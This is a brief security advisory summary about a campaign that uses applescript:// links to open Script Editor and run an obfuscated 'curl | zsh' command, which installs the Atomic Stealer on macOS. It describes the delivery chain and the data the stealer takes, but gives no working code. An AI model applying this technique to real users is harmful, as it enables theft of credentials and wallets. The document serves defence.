Researchers observed a new campaign delivering the Atomic Stealer to macOS users by abusing the built-in Script Editor via applescript:// links that open pre-filled malicious code. The obfuscated ‘curl | zsh’ payload decodes and runs a Mach-O Atomic Stealer binary that harvests Keychain items, browser wallet extensions, passwords, cookies, and system data, so users should avoid running Script Editor prompts and follow official Apple guidance. #AtomicStealer #ScriptEditor
Keypoints
- Attackers use fake Apple-themed sites with applescript:// links to launch Script Editor with malicious, pre-filled scripts.
- The malicious script executes an obfuscated ‘curl | zsh’ command that downloads and runs a payload in memory.
- The final payload is a Mach-O binary (Atomic Stealer/AMOS) that exfiltrates Keychain data, browser wallets, autofill data, passwords, cookies, and system information.
- This variation of the ClickFix technique removes the need for users to manually run Terminal commands, sidestepping some user interaction protections.
- Mac users should treat Script Editor prompts as high-risk and rely on official Apple documentation for troubleshooting.